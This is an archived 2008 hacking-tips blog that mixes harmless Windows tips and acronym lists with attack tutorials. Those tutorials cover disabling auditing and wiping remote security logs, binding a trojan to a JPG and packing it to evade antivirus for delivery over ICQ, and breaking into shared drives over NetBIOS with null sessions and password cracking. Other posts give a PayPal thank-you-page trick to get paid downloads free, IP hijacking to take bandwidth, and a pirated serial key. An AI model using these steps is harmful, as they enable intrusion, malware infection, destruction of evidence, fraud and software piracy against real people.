Saturday, August 30, 2008

free sms sites

www.160by2.com

chek this site for sms spoofing

www.sharpmail.co.uk

SMS from Cisco - Its Free

Register youself with SMS from Cisco.Stay current with Cisco news stories, product updates, security advisories, and more. Get a text message as soon as new content is posted.


http://www.cisco.com/web/about/facts_info/sms_reg_info.html

Earlier this Service was available only in United States but, now it is also available in India too.

And Its FREE too

Thursday, August 28, 2008

How hackers can erase their tracks after hacking

Whenever someone comes in contact with another person, place, or thing, something of that person is left behind. This means that the attacker must disable logging, clear log files, eliminate evidence, plant additional tools, and cover his tracks.


Here are some of the techniques that an attacker can use to cover his tracks:-
(1) Disabling logging – Auditpol was originally included in the NT Resource kit for administrators. It works well for hackers too, as long as they have administrative access.
Just point it at the victim’s system as follows:
C:\>auditpol \\192.168.10 /disable
Auditing Disabled

(2) Clear the log file – The attacker will also attempt to clear the log. Tools, such as Winzapper, evidence Eliminator, or Elsave, can be used. Elsave will remove all entries from the logs, except one entry that shows the logs were cleared.
It is used as follows:

Elsave -s \\192.168.13.10 -1 “Security” -C

(3) Cover their tracks – One way for attackers to cover their tracks is with rootkits. Rootkits are malicious codes designed to allow an attacker to get expanded access and hide his presence. While rootkits were traditionally a Linux tool, they are now starting to make their way into the Windows environment. Tools, such as NTrootkit and AFX Windows rootkits, are available for Windows systems. If you suspect that a computer has been rootkitted, you need to use an MD5 checksum utility or a program, such as Tripwire, to determine the viability of your programs. The only other alternative is to rebuild the computer from known good media.

Tuesday, August 26, 2008

computer Acronyms

ADSL - Asymmetric Digital Subscriber Line

AGP - Accelerated Graphics Port
ALI - Acer Labs, Incorporated
ALU - Arithmetic Logic Unit
AMD - Advanced Micro Devices
APC - American Power Conversion
ASCII - American Standard Code for Information Interchange
ASIC - Application Specific Integrated Circuit
ASPI - Advanced SCSI Programming Interface
AT - Advanced Technology
ATI - ATI Technologies Inc.
ATX - Advanced Technology Extended

--- B ---
BFG - BFG Technologies
BIOS - Basic Input Output System
BNC - Barrel Nut Connector

--- C ---
CAS - Column Address Signal
CD - Compact Disk
CDR - Compact Disk Recorder
CDRW - Compact Disk Re-Writer
CD-ROM - Compact Disk - Read Only Memory
CFM - Cubic Feet per Minute (ft�/min)
CMOS - Complementary Metal Oxide Semiconductor
CPU - Central Processing Unit
CTX - CTX Technology Corporation (Commited to Excellence)

--- D ---

DDR - Double Data Rate
DDR-SDRAM - Double Data Rate - Synchronous Dynamic Random Access Memory
DFI - DFI Inc. (Design for Innovation)
DIMM - Dual Inline Memory Module
DRAM - Dynamic Random Access Memory
DPI - Dots Per Inch
DSL - See ASDL
DVD - Digital Versatile Disc
DVD-RAM - Digital Versatile Disk - Random Access Memory

--- E ---
ECC - Error Correction Code
ECS - Elitegroup Computer Systems
EDO - Extended Data Out
EEPROM - Electrically Erasable Programmable Read-Only Memory
EPROM - Erasable Programmable Read-Only Memory
EVGA - EVGA Corporation

--- F ---
FC-PGA - Flip Chip Pin Grid Array
FDC - Floppy Disk Controller
FDD - Floppy Disk Drive
FPS - Frame Per Second
FPU - Floating Point Unit
FSAA - Full Screen Anti-Aliasing
FS - For Sale
FSB - Front Side Bus

--- G ---
GB - Gigabytes
GBps - Gigabytes per second or Gigabits per second
GDI - Graphical Device Interface
GHz - GigaHertz

--- H ---
HDD - Hard Disk Drive
HIS - Hightech Information System Limited
HP - Hewlett-Packard Development Company
HSF - Heatsink-Fan

--- I ---
IBM - International Business Machines Corporation
IC - Integrated Circuit
IDE - Integrated Drive Electronics
IFS- Item for Sale
IRQ - Interrupt Request
ISA - Industry Standard Architecture
ISO - International Standards Organization

--- J ---
JBL - JBL (Jame B. Lansing) Speakers
JVC - JVC Company of America

- K ---
Kbps - Kilobits Per Second
KBps - KiloBytes per second

--- L ---
LG - LG Electronics
LAN - Local Are Network
LCD - Liquid Crystal Display
LDT - Lightning Data Transport
LED - Light Emitting Diode

--- M ---
MAC - Media Access Control
MB � MotherBoard or Megabyte
MBps - Megabytes Per Second
Mbps - Megabits Per Second or Megabits Per Second
MHz - MegaHertz
MIPS - Million Instructions Per Second
MMX - Multi-Media Extensions
MSI - Micro Star International

--- N ---
NAS - Network Attached Storage
NAT - Network Address Translation
NEC - NEC Corporation
NIC - Network Interface Card

--- O ---
OC - Overclock (Over Clock)
OCZ - OCZ Technology
OEM - Original Equipment Manufacturer

--- P ---
PC - Personal Computer
PCB - Printed Circuit Board
PCI - Peripheral Component Interconnect
PDA - Personal Digital Assistant
PCMCIA - Peripheral Component Microchannel Interconnect Architecture
PGA - Professional Graphics Array
PLD - Programmable Logic Device
PM - Private Message / Private Messaging
PnP - Plug 'n Play
PNY - PNY Technology
POST - Power On Self Test
PPPoA - Point-to-Point Protocol over ATM
PPPoE - Point-to-Point Protocol over Ethernet
PQI - PQI Corporation
PSU - Power Supply Unit

--- R ---
RAID - Redundant Array of Inexpensive Disks
RAM - Random Access Memory
RAMDAC - Random Access Memory Digital Analog Convertor
RDRAM - Rambus Dynamic Random Access Memory
ROM - Read Only Memory
RPM - Revolutions Per Minute

--- S ---
SASID - Self-scanned Amorphous Silicon Integrated Display
SCA - SCSI Configured Automatically
SCSI - Small Computer System Interface
SDRAM - Synchronous Dynamic Random Access Memory
SECC - Single Edge Contact Connector
SODIMM - Small Outline Dual Inline Memory Module
SPARC - Scalable Processor ArChitecture
SOHO - Small Office Home Office
SRAM - Static Random Access Memory
SSE - Streaming SIMD Extensions
SVGA - Super Video Graphics Array
S/PDIF - Sony/Philips Digital Interface

--- T ---
TB - Terabytes
TBps - Terabytes per second
Tbps - Terabits per second
TDK - TDK Electronics
TEC - Thermoelectric Cooler
TPC - TipidPC
TWAIN - Technology Without An Important Name

--- U ---
UART - Universal Asynchronous Receiver/Transmitter
USB - Universal Serial Bus
UTP - Unshieled Twisted Pair

--- V ---
VCD - Video CD
VPN - Virtual Private Network

--- W ---
WAN - Wide Area Network
WTB - Want to Buy
WYSIWYG - What You See Is What You Get

--- X ---
XGA - Extended Graphics Array
XFX - XFX Graphics, a Division of Pine
XMS - Extended Memory Specification
XT - Extended Technology

The best firewall is?

The best firewall is a hardware firewall that is completely separate from your operating system. It need not be a dedicated router, could be an old pentium box running Linux. Below I have found some sites that have How To's on setting up an outside hardware router using an old computer and using a little linux program that fits on a single floppy disk.

Brief Description:
floppyfw is a router with the advanced firewall-capabilities in Linux that fits on one single floppy disc.

Features:
Access lists, IP-masquerading (Network Address Translation), connection tracked packet filtering and (quite) advanced routing. Package for traffic shaping is also available.
Requires only a 386sx or better with two network interface cards, a 1.44MB floppy drive and 12MByte of RAM ( for less than 12M and no FPU, use the 1.0 series, which will stay maintained. )
Very simple packaging system. Is used for editors, PPP, VPN, traffic shaping and whatever comes up. (now this is looking even more like LRP (may it rest in peace) but floppyfw is not a fork.)
Logging through klogd/syslogd, both local and remote.
Serial support for console over serial port.
DHCP server and DNS cache for internal networks.

floppyfw


h#tp://www.zelow.no/floppyfw/



Sentry Firewall CD-ROM is a Linux-based bootable CDROM suitable for use as an inexpensive and easy to maintain firewall, server, or IDS(Intrusion Detection System) Node. The system is designed to be immediately configurable for a variety of different operating environments via a configuration file located on a floppy disk, a local hard drive, and/or a network via HTTP(S), FTP, SFTP, or SCP.

The Sentry Firewall CD is a complete Linux system that runs off of an initial ramdisk, much like a floppy-based system, and a CD. The default kernel is a current 2.4.x series kernel with various Netfilter patches applied. An OpenWall-patched current 2.2.x kernel is also available on the CD.

Booting from the CDROM is a fairly familiar process. The BIOS execs the bootloader(Syslinux) - which then displays a bootprompt and loads the kernel and ramdisk into memory. Once the kernel is running, the ramdisk is then mounted as root(/). At this point our configuration scripts are run(written in perl) that configure the rest of the system. It is the job of these configure scripts to put the various startup and system files into the proper location using either what is declared in the configuration file(sentry.conf) or the system defaults located in the /etc/default directory.

Most of the critical files used at boot time can be replaced with your own copy when declared in the configuration file. This is essentially how we allow the user to configure the system using his/her own configuration and init files.

All of the binaries, files, scripts, etc, used to create the CD-ROM are also available on the CD-ROM. So, with a little practice, you can easily build and customize your own bootable Sentry Firewall CD. Please see the HOWTO for more details.


Sentry Firewall


ht*p://www.sentryfirewall.com/docs.html#overview

hack those sites which link with PAYPAL- education purpose only


How to hack paypal sites or how to download applications free from PayPal sites....U just
need to know a bit of HTML anyone want to download any application from da sites which r containing PayPal order page & a link to start...

First off all u need to hide ur ip-address use a proxy server otherwise ur ip address will be recorded in some sites click here to hide ur ip-address.

1) Rightclick your mouse (ctrl+click) view source and open the source of the site in an a texteditor
2) Search for the word "return"
3) Next to it you can find the url for the thank you page
4) Copy the url and paste it in your browser and you will see the download link

This works only if you can download instantly after payment, it will not work if the link needs to be emailed to you.

You can try it here to start with:
Code:
http://www.ramphelp.com/halfpipe.html


About half way down the page you will find:< type="hidden" name="return" value="http://www.ramphelp.com/65984523/thanks/68912h
p654/26865thankyouhp08363215423.html ">

Copy the link into your browser and download.

Make trojan unditectable!!

This trick works only by sending a picture to someone on ICQ.
How to make this work?

1 Find a small Trojan. Best not detected by AVP.
2 Find a binder that can bind a JPG to an exe. Best not detected by AVP.
3 Rename the result file and change the icon.


1 First you must find a small Trojan to bind to the picture.
That way the size will not be too big and the receiver won`t get suspicious by long
downloading times or big picture sizes.

The best is to use a small Trojan with ICQ notify.
Then you get a notify on ICQ with IP address.
You need that to connect and to upload another Trojan that has more functions.
Many of them are out there:
MiniCommand 1.2, FC`s InCommand, Slim`s Asylum and Webasylum, WWWPW.
There are lots of them, and new ones getting available every day. Try to get an unpacked server,
so you can pack the server.
If the server is packed, it is harder for antivirus programs to detect it.
Edit the server.

Then test the server on your own computer, to see if you get an ICQ pager.
Make this work. Else edit the server again. Do not forget to remove the server afterwards.
You can do this by connecting to 127.0.0.1, your own IP.
Then give the command: "remove server".



To prevent recognition of antivirus programs you should then pack the server.
Use an exe packer or compressor for that. A lot of packers you can find on the net.
At Here you'll find some.
But the AVP also uses unpackers, so find one that is not so familiar.
A list of what AVP recognizes of Trojans and what kind of decompressing it does,
can be find here.
Then you should test the server for AVP recognition.
If AVP recognizes the server, you should try another packer, or another Trojan server.

2 The goal is that the victim sees the picture and
that the server is secretly executed at the same time.
To make one file of the server and the JPG, you use a "exe binder" or "joiner".
These ones are also recognized by AVP. So it is important to find one that is not detected.
Take a new one and try it out with AVP.
Binders you can find at here.
Not all binders do bind a JPG to an exe, so find the right one.

3 Next step is to make the result look like a JPG when you send it by ICQ.
With some binders you can change the icon. Else you can use Microangelo to edit the icon.
You can get that at download.com.
Last step is to make the .exe disappear.
You can do that by renaming the result to "me.in.the.car.without.wearing.a.bra.exe"
That way the name is too long to see the "exe".
Or rename the result like this: Mypic.jpg .exe
Put so many spaces between jpg and exe, so that the exe does not show up when you send the file.

When you get the notify you have remote control.
Remove the result.exe and upload the normal JPG instead.
Removing your traces a little.

Monday, August 25, 2008

Hack [Sify,Reliance,Others] Speed Upto 10 MBPS [Beam Cable Hack]


First Download this ETHERNET Ip Sniffer called ETHERDETECT

Use the tool to Scan Ip's in your network

Keep Scanning till you get some 200 Ip's ..

Then just change the last 3 digits of your IP Address with the IP's you get In that scanner !!
NOTE:Please save your Ip address somewhere so as to get back to your original ip !

It will say "Ip conflict" error,keep trying with other Ip's untill you succeed.

Sometimes when you will change your Ip you will get same speed ...in that case ..try another ip


..:~Download Link~:..
CODE
http://rapidshare.com/files/46070425/EtherDetect_setup.exe


..:~SERIAL~:..
CODE
YW38X6HKWYT4CTK

Watch Any Movie In Paint (100%) Working


* First start a movie in any player.

* Then open Paint.

* Now, in the player when the movie is being played, press "Print screen" button on your key board.

* Now, Press ctrl+v in Paint

* Leave the movie player open and don't minimize it.

* Open Paint now and see the movie in the Paint

*you can edit it also

ip locator .......find the location of a ip


this is a software to find the location of the ip

link:
http://www.4shared.com/file/25808579/5856eca5/iplocator.html

Increasing options in add/remove programs


Not a fan of MSN Messenger? don't want Windows Media Player on your system? Fair enough, but if you go to Add/Remove Programs in the Control Panel, by default none of Windows XP's 'built in' programs are visible. it's fairly easy to change, though... just open the file X:\Windows\inf\sysoc.inf (where X: is the drive letter where Windows XP is installed) in Notepad. You should see a section of the file something like this:

[Components]
NtComponents=ntoc.dll,NtOcSetupProc,,4
WBEM=ocgen.dll,OcEntry,wbemoc.inf,hide,7
Display=desk.cpl,DisplayOcSetupProc,,7
Fax=fxsocm.dll,FaxOcmSetupProc,fxsocm.inf,,7
NetOC=netoc.dll,NetOcSetupProc,netoc.inf,,7
iis=iis.dll,OcEntry,iis.inf,,7
com=comsetup.dll,OcEntry,comnt5.inf,hide,7
dtc=msdtcstp.dll,OcEntry,dtcnt5.inf,hide,7
IndexSrv_System = setupqry.dll,IndexSrv,setupqry.inf,,7
TerminalServer=TsOc.dll, HydraOc, TsOc.inf,hide,2
msmq=msmqocm.dll,MsmqOcm,msmqocm.inf,,6
ims=imsinsnt.dll,OcEntry,ims.inf,,7
fp_extensions=fp40ext.dll,FrontPage4Extensions,fp40ext.inf,,7
AutoUpdate=ocgen.dll,OcEntry,au.inf,hide,7
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
RootAutoUpdate=ocgen.dll,OcEntry,rootau.inf,,7
IEAccess=ocgen.dll,OcEntry,ieaccess.inf,,7

This is a list of all components installed at the moment. I've taken the example of MSN Messenger - the program entry called 'msmsgs', third-last line. You can see the word 'hide' highlighted - this is the string which tells Windows not to display the component in the Add/Remove Programs list. Fix this up by simply deleting the word 'hide' like so:

msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7

To this:

msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7

Now, after restarting, you should be able to see MSN Messenger in the Add/Remove Programs list. If you want to be able to quickly view and remove all components, simply open the sysoc.inf file and do a global find and replace for the word ",hide" and replace it with a single comma ",".

Create a Shortcut to Lock Your Computer


Leaving your computer in a hurry but you don’t want to log off? You can double-click a shortcut on your desktop to quickly lock the keyboard and display without using CTRL+ALT+DEL or a screen saver. To create a shortcut on your desktop to lock your computer: Right-click the desktop. Point to New, and then click Shortcut. The Create Shortcut Wizard opens. In the text box, type the following: rundll32.exe user32.dll,LockWorkStation Click Next. Enter a name for the shortcut. You can call it "Lock Workstation" or choose any name you like. Click Finish. You can also change the shortcut's icon (my personal favorite is the padlock icon in shell32.dll). To change the icon: Right click the shortcut and then select Properties. Click the Shortcut tab, and then click the Change Icon button. In the Look for icons in this file text box, type: Shell32.dll. Click OK. Select one of the icons from the list and then click OK You could also give it a shortcut keystroke such CTRL+ALT+L. This would save you only one keystroke from the normal command, but it could be more convenient.

How to Hide the drives(c:,d:,e:,...etc)


1.Go to start->run.Type regedit.Now go to:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Now in the right pane
create a new DWORD item and name it NoDrives (it is case sensitive).
Now modify it's value and set it to 3FFFFFF (Hexadecimal) .
Now restart your Computer.
So, now when you click on My Computer, no drives will be shown(all gone...).

To enable display of drives in My Computer, simply delete this DWORD item that you created.Again restart your Computer.You can now see all the drives again. Magic.......

Free Access To Websites Without Registering

Go to

-http://bugmenot.com/

and type the URL of the website you want to log into.
Examples:

-http://www.nytimes.com/, -http://www.winnetmag.com/
etcetera.

Another (and better) way is changing the user agent of your browser to:
Googlebot/2.1+

-http://www.googlebot.com/bot.html

This is very easy in Mozilla's Firefox. Download and install the User Agent Switcher from

-http://www.chrispederick.com/work/firefox/useragentswitcher/
and add the Googlebot user agent.

chat with command prompt

If you want personal chat with a friend

you don't need to download any yahoo messenger
All you need is your friends IP address and Command Prompt.
Firstly, open Notepad and enter:
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A
Now save this as "Messenger.bat". Open the .bat file and in Command
Prompt you should see:
MESSENGER
User:
After "User" type the IP address of the computer you want to contact.
After this, you should see this:
Message:
Now type in the message you wish to send.Before you press "Enter" it should look like this:
MESSENGER
User:27.196.391.193
Message: Hi
Now all you need to do is press "Enter", and start chatting!

Possible "RUN" commands

Possible "RUN" commands

You can access all these programs by going through START/RUN.


--> SQL Client Configuration - cliconfg
--> System Configuration Editor - sysedit
--> System Configuration Utility - msconfig
--> System File Checker Utility (Scan Immediately)- sfc /scannow
--> System File Checker Utility (Scan Once At Next Boot)- sfc /scanonce
--> System File Checker Utility (Scan On Every Boot) - sfc /scanboot
--> System File Checker Utility (Return to Default Setting)- sfc /revert
--> System File Checker Utility (Purge File Cache)- sfc /purgecache
--> System File Checker Utility (Set Cache Size to size x)-sfc/cachesize=x
--> System Information - msinfo32.
--> Task Manager – taskmgr
--> System Properties - sysdm.cpl
--> TCP Tester - tcptest
--> Telnet Client - telnet
--> User Account Management- nusrmgr.cpl
--> Utility Manager - utilman
--> Windows Address Book - wab
--> Windows Address Book Import Utility - wabmig
--> Windows Backup Utility (if installed)- ntbackup
--> Windows Explorer - explorer
--> Windows Firewall- firewall.cpl
--> Windows Magnifier- magnify
--> Windows Management Infrastructure - wmimgmt.msc
--> Windows Media Player - wmplayer
--> Windows Messenger - msmsgs
--> Windows Picture Import Wizard (need camera connected)- wiaacmgr
--> Windows System Security Tool – syskey
--> Windows Update Launches - wupdmgr
--> Windows Version (to show which version of windows)- winver
--> Windows XP Tour Wizard - tourstart
--> Wordpad - write--> Password Properties - password.cpl
--> Performance Monitor - perfmon.msc
--> Phone and Modem Options - telephon.cpl
--> Phone Dialer - dialer
--> Pinball Game - pinball
--> Power Configuration - powercfg.cpl
--> Printers and Faxes - control printers
--> Printers Folder – printers
--> Private Character Editor - eudcedit
--> Quicktime (If Installed)- QuickTime.cpl
--> Real Player (if installed)- realplay
--> Regional Settings - intl.cpl
--> Registry Editor - regedit
--> Registry Editor - regedit32
--> Remote Access Phonebook - rasphone
--> Remote Desktop - mstsc
--> Removable Storage - ntmsmgr.msc
--> Removable Storage Operator Requests - ntmsoprq.msc
--> Resultant Set of Policy (XP Prof) - rsop.msc
--> Scanners and Cameras - sticpl.cpl
--> Scheduled Tasks - control schedtasks
--> Security Center - wscui.cpl
--> Services - services.msc
--> Shared Folders - fsmgmt.msc
--> Shuts Down Windows - shutdown
--> Sounds and Audio - mmsys.cpl
--> Spider Solitare Card Game - spider
--> Malicious Software Removal Tool - mrt
--> Microsoft Access (if installed) - access.cpl
--> Microsoft Chat - winchat
--> Microsoft Excel (if installed) - excel
--> Microsoft Frontpage (if installed)- frontpg
--> Microsoft Movie Maker - moviemk
--> Microsoft Paint - mspaint
--> Microsoft Powerpoint (if installed)- powerpnt
--> Microsoft Word (if installed)- winword
--> Microsoft Syncronization Tool - mobsync
--> Minesweeper Game - winmine
--> Mouse Properties - control mouse
--> Mouse Properties - main.cpl
--> Nero (if installed)- nero
--> Netmeeting - conf
--> Network Connections - control netconnections
--> Network Connections - ncpa.cpl
--> Network Setup Wizard - netsetup.cpl
--> Notepad - notepad
--> Nview Desktop Manager (If Installed)- nvtuicpl.cpl
--> Object Packager - packager
--> ODBC Data Source Administrator- odbccp32.cpl
--> On Screen Keyboard - osk
--> Opens AC3 Filter (If Installed) - ac3filter.cpl
--> Outlook Express - msimn
--> Paint – pbrush
--> Keyboard Properties - control keyboard
--> IP Configuration (Display Connection Configuration) - ipconfi/all
--> IP Configuration (Display DNS Cache Contents)- ipconfig /displaydns
--> IP Configuration (Delete DNS Cache Contents)- ipconfig /flushdns
--> IP Configuration (Release All Connections)- ipconfig /release
--> IP Configuration (Renew All Connections)- ipconfig /renew
--> IP Configuration(RefreshesDHCP&Re-RegistersDNS)-ipconfig/registerdns
--> IP Configuration (Display DHCP Class ID)- ipconfig/showclassid
--> IP Configuration (Modifies DHCP Class ID)- ipconfig /setclassid
--> Java Control Panel (If Installed)- jpicpl32.cpl
--> Java Control Panel (If Installed)- javaws
--> Local Security Settings - secpol.msc
--> Local Users and Groups - lusrmgr.msc
--> Logs You Out Of Windows - logoff.....
--> Accessibility Controls - access.cpl
--> Accessibility Wizard - accwiz
--> Add Hardware - Wizardhdwwiz.cpl
--> Add/Remove Programs - appwiz.cpl
--> Administrative Tools control - admintools
--> Adobe Acrobat (if installed) - acrobat
--> Adobe Designer (if installed)- acrodist
--> Adobe Distiller (if installed)- acrodist
--> Adobe ImageReady (if installed)- imageready
--> Adobe Photoshop (if installed)- photoshop
--> Automatic Updates - wuaucpl.cpl
--> Bluetooth Transfer Wizard – fsquirt
--> Calculator - calc
--> Certificate Manager - certmgr.msc
--> Character Map - charmap
--> Check Disk Utility - chkdsk
--> Clipboard Viewer - clipbrd
--> Command Prompt - cmd
--> Component Services - dcomcnfg
--> Computer Management - compmgmt.msc
--> Control Panel - control
--> Date and Time Properties - timedate.cpl
--> DDE Shares - ddeshare
--> Device Manager - devmgmt.msc
--> Direct X Control Panel (If Installed)- directx.cpl
--> Direct X Troubleshooter- dxdiag
--> Disk Cleanup Utility- cleanmgr
--> Disk Defragment- dfrg.msc
--> Disk Management- diskmgmt.msc
--> Disk Partition Manager- diskpart
--> Display Properties- control desktop
--> Display Properties- desk.cpl
--> Display Properties (w/Appearance Tab Preselected)- control color
--> Dr. Watson System Troubleshooting Utility- drwtsn32
--> Driver Verifier Utility- verifier
--> Event Viewer- eventvwr.msc
--> Files and Settings Transfer Tool- migwiz
--> File Signature Verification Tool- sigverif
--> Findfast- findfast.cpl
--> Firefox (if installed)- firefox
--> Folders Properties- control folders
--> Fonts- control fonts--> Fonts Folder- fonts
--> Free Cell Card Game- freecell
--> Game Controllers- joy.cpl
--> Group Policy Editor (XP Prof)- gpedit.msc
--> Hearts Card Game- mshearts
--> Help and Support- helpctr
--> HyperTerminal- hypertrm
--> Iexpress Wizard- iexpress
--> Indexing Service- ciadv.msc
--> Internet Connection Wizard- icwconn1
--> Internet Explorer- iexplore
--> Internet Setup Wizard- inetwiz
--> Internet Properties- inetcpl.cpl

Hacking with NetBIOS

Hack using NetBIOS ( hacking someones remote computer)

I have written this tutorial keeping in mind that readers having only the basic knowledge will also be able to know how hackers hack using NetBIOS

A BRIEF LESSON ON NETBIOS
NetBIOS stands for Network Basic Input Output System .It was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. If you have experience of working on a LAN using Microsoft Windows Operating Systems (like Windows98 , Windows Me, Windows NT etc), you must have clicked on "Network Neighborhood" to access the computers attached to your network. After clicking on the icon you would have seen the names of the computer . Do you know what exactly happens when you click on Network Neighborhood? Your computer tries to get the names of the computers attached to the network with by issuing command to NetBIOS . NetBIOS gives the name of the computers that have been registered . In short NetBIOS gives the various information of the computers on a network . These Include-

Name of the computer

Username

Domain

Computer Name

and many others.

Like any other service it also works on a port . It has been assigned a port number 139.


THE NBTSTAT COMMAND




You can manually interact with the NetBIOS with the help of NBTSTAT command. To use this command click on the start button then select RUN... and type "command" without quotes to launch MS-DOS Command Prompt. Alternatively you may click on Start Button then go to Programs and then select Command Prompt. Once you are in Command Prompt you can exit by typing command EXIT . To launch Command Prompt in full screen mode press ALT+ENTER key combination .To get back to the original window again press ALT+ENTER key combination. If you have launched the command prompt you will get

c:\windows>

If you do not get windows displayed after c:\ don't worry just keep going , all required commands will work fine.

Now lets play with the NBTSTAT command.

If you want to get more help from MS-DOS about this command type NBTSTAT/? on the prompt i.e.

c:\windows>nbtstat/?

If you want to get the NetBIOS information of your computer type the following command

c:\windows>nbtstat -a 127.0.0.1

This command will list the NetBIOS information. A typical example

NetBIOS Remote Machine Name Table

Name Number Type Usage

==========================================================================

workgroup 00 G Domain Name

my_computer 03 U Messenger Service

myusername 03 U Messenger Service


MAC Address = 00-02-44-14-23-E6

Please note that we have used our ip address to be 127.0.0.1 . This ip address is called as "Loop Back" ip address because this ip address always refers to the computer you are using.

This example is self explanatory . We need not go in details. We need to know about the Name and Number. The Name displays the Name of the NetBIOS and there is a corresponding hexagonal number . You may see some additional names in your case.

If you want to get the NetBIOS names of a remote computer, the command is

c:\windows>nbtstat -a ipaddress

Example - To get the NetBIOS names of a computer having ip address 203.195.136.156, we shall use the command

NOTE-203.195.136.156 may be a active ip address of someone's computer. I am using it only as an example. Please don't hack this computer.

c:\windows>nbtstat -a 203.195.136.156


WHAT YOU NEED TO HACK
All you need is a Windows based operating system like Windows 98 and Me (but I prefer Windows NT, 2000, XP) and an internet connection.


TYPES OF ATTACKS

We can launch two types of attack on the remote computer having NetBIOS.

1. Reading/Writing to a remote computer system

2. Denial of Service



Searching for a victim

You may manually search for the victims by first using the nbtstat -a ipaddress and then net view \\ipaddress . If at first you don't succeed step to next ip address until you find a suitable ip address. You may also use a port scanner .A port scanner is simply a software that can search for any block of ip address say 192.168.0.1 to 192.168.0.255 for one or more ports. "Orge" is a port scanner that gives NetBIOS names of the remote computer.



Lets Hack -Part 1 Remotely reading/writing to a victiim's computer

Believe it or not but NetBIOS is the easiest method to break into somebody's computer. However there is a condition that must be satisfied before you can hack. The condition is that the victim must have enabled File And Printer Sharing on his computer. If the victim has enabled it , the nbtstat command will display one more NetBIOS name. Now lets us take a example. Suppose you know a ip address that has enabled File And Printer Sharing and let suppose the ip address happens to be 203.195.136.156 .
The command that you will use to view the NetBIOS name is

c:\windows>nbtstat -a 203.195.136.156

Let suppose that the output comes out to be

NetBIOS Remote Machine Name Table

Name Type Status
-------------------------------------------------------------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered


MAC Address = 00-02-44-14-23-E6



The number <20> shows that the victim has enabled the File And Printer Sharing.

-------------------------------------------------------------------------------------------------------------------------------------------------------------

NOTE - If you do not get this number there are two possibilities

1. You do not get the number <20> . This shows that the victim has not enabled the File And Printer Sharing .

2. You get "Host Not found" . This shows that the port 139 is closed or the ip address doesn't exists.

---------------------------------------------------------------------------------------------------------

Now our next step would be to view the drive or folders the victim is sharing.

We will use command

c:\windows>net view \\203.195.136.156

Let suppose we get the following output

Shared resources at \\203.195.136.156
ComputerNameGoesHere

Share name Type Used as Comment

-----------------------------------------------------------------------------------------------
CDISK Disk


The command completed successfully.



"DISK" shows that the victim is sharing a Disk named as CDISK . You may also get some additional information like



Shared resources at \\203.195.136.156


ComputerNameGoesHere

Share name Type Used as Comment

-----------------------------------------------------------------------------------------------
HP-6L Print


"Print " shows that the victim is sharing a printer named as HP-6L

If we are able to share the victims hard disks or folders or printers we will be able to read write to the folders or hard disks or we may also be able to print anything on a remote printer ! Now let us share the victims computer's hard disk or printer.

Till now we know that there is a computer whose ip address happens to be 203.195.136.156 and on that computer File and printer sharing is enabled and the victim's hard disk 's name is CDISK.

Now we will connect our computer to that hard disk . After we have connected successfully a drive will be created on our computer and on double clicking on it we will be able to view the contents of the drive. If we have connected our newly formed drive to the victim's share name CDISK it means that we our drive will have the same contents as that of the CDISK .

Lets do it.

We will use the NET command to do our work .

Let suppose we want to make a drive k: on our computer and connect it to victim's share we will issue the command

c:\windows>net use k: \\203.195.136.156\CDISK

You may replace k letter by any other letter.

If the command is successful we will get the confirmation - The command was completed successfullly

The command was completed successfully

Now just double click on the My Computer icon on your desktop and you will be a happy hacker!

We have just crested a new drive k: . Just double click on it and you will find that you are able to access the remote computer's hard disk. Enjoy your first hack!


Cracking Share passwords
Sometimes when we use "net use k: \\ipaddress\sharename" we are asked for a password. There is a password cracker "PQWAK" . All you have to enter ip address and the share name and it will decrypt the password within seconds. Please note that this can crack only the passwords is the remote operating system is running on -

Windows 95

Windows 98

Windows Me




Using IPC$ to hack Windows NT,2000,XP

Now you must be thinking of something that can crack share passwords on NT based operating systems like Windows NT and Windows 2000.

IPC$ is there to help us. It is not at all a password cracker . It is simply a string that tells the remote operating system to give guest access that is give access without asking for password.

We hackers use IPC$ in this way

c:\windows>net use k: \\123.123.123.123\ipc$ "" /user:""

You may replace k letter by any other letter. If you replace it by "b" (type without quotes) a new drive will be created by a drive letter b.

Please note that you won't be able to get access to victim's shared drives but you you can gather valuable information like names of all the usernames, users that have never logged, and other such information. One such tool that uses the ipc$ method is "Internet Periscope". Another tool is "enum" - its my favorite toot however it is run on command promt.



Penetrating in to the victim's computer

Now that you have access to a remote computer you may be interested in viewing his secret emails, download hismp3 songs , and more...

But if you think like a hard core hacker you would like to play some dirty tricks like you may wish to install a key logger or install a back door entry Trojan like netbus and backorifice or delete or copy some files. All these tasks involves writing to victim's hard disk . For this you need to have write access permission






Lets Hack - Part 2 Denial of service attack


This type of attacks are meant to be launched by some computer techies because this type of attack involves using Linux Operating System and compiling C language files. To exploit these vulnerabilities you have to copy exploit code from sites like neworder,securityfocus etc and comiple them.












Note- This tutorial may bear a resemblance to tutorials written by other authors

Saturday, August 23, 2008

Voice-over-Internet protocol [VOIP]

Voice-over-Internet protocol is a protocol optimized for the transmission of voice through the Internet or other packet-switched networks. VoIP is often used abstractly to refer to the actual transmission of voice (rather than the protocol implementing it). This latter concept is also referred to as IP telephony, Internet telephony, voice over broadband, broadband telephony, and broadband phone.

VoIP providers may be viewed as commercial realizations of the experimental Network Voice Protocol (1973) invented for the ARPANET providers. Some cost savings are due to using a single network to carry voice and data, especially where users have underused network capacity that can carry VoIP at no additional cost. VoIP-to-VoIP phone calls are sometimes free, while VoIP calls connecting to public switched telephone networks (VoIP-to-PSTN) may have a cost that is borne by the VoIP user.

Voice-over-IP systems carry telephony signals as digital audio, typically reduced in data rate using speech data compression techniques, encapsulated in a data-packet stream over IP.

There are two types of PSTN-to-VoIP services: Direct inward dialing (DID) and access numbers. DID will connect a caller directly to the VoIP user, while access numbers require the caller to provide an extension number for the called VoIP user.

*Mobile Number Portability (MNP) in the Internet Telephony Environment

